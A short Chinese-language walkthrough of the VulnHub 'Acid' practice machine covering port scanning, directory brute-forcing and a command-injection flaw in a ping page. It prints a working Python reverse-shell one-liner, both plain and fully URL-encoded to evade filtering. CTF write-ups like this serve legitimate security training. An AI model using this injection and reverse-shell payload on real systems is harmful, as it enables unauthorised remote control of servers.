vulnhub-acid

渗透测试

靶机下载：https://www.vulnhub.com/entry/acid-server,125/

设置kali和靶机连接方式都为NAT

端口扫描和目录爆破

确认靶机的地址为192.168.2.134

nmap扫描端口

发现了33447端口，从浏览器中打开

没找到什么线索

去扫描目录看看

/Challenge

/Challenge/include.php

最后找到了这个

/Challenge/Magic_Box/command.php

是一个ping命令执行页面

输入127.0.0.1;ls，查看源码，发现ls命令成功执行

接下来就可以反弹shell了

反弹shell

首先开启监听

构造反弹shell命令（因为kali一直连接不成功…这里主机换成了windows，ip也跟kali的不同）

192.168.2.1;python -c “import os,socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((‘192.168.2.1’,7777));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call([‘/bin/bash’,’-i’]);”

为了防止被过滤，;后面的内容使用url编码

192.168.2.1;%70%79%74%68%6f%6e%20%2d%63%20%22%69%6d%70%6f%72%74%20%6f%73%2c%73%6f%63%6b%65%74%2c%73%75%62%70%72%6f%63%65%73%73%3b%73%3d%73%6f%63%6b%65%74%2e%73%6f%63%6b%65%74%28%73%6f%63%6b%65%74%2e%41%46%5f%49%4e%45%54%2c%73%6f%63%6b%65%74%2e%53%4f%43%4b%5f%53%54%52%45%41%4d%29%3b%73%2e%63%6f%6e%6e%65%63%74%28%28%27%31%39%32%2e%31%36%38%2e%32%2e%31%27%2c%37%37%37%37%29%29%3b%6f%73%2e%64%75%70%32%28%73%2e%66%69%6c%65%6e%6f%28%29%2c%30%29%3b%6f%73%2e%64%75%70%32%28%73%2e%66%69%6c%65%6e%6f%28%29%2c%31%29%3b%6f%73%2e%64%75%70%32%28%73%2e%66%69%6c%65%6e%6f%28%29%2c%32%29%3b%70%3d%73%75%62%70%72%6f%63%65%73%73%2e%63%61%6c%6c%28%5b%27%2f%62%69%6e%2f%62%61%73%68%27%2c%27%2d%69%27%5d%29%3b%22

(这里因浏览器表格内输入不了这么长的内容，需要用burpsuite抓包)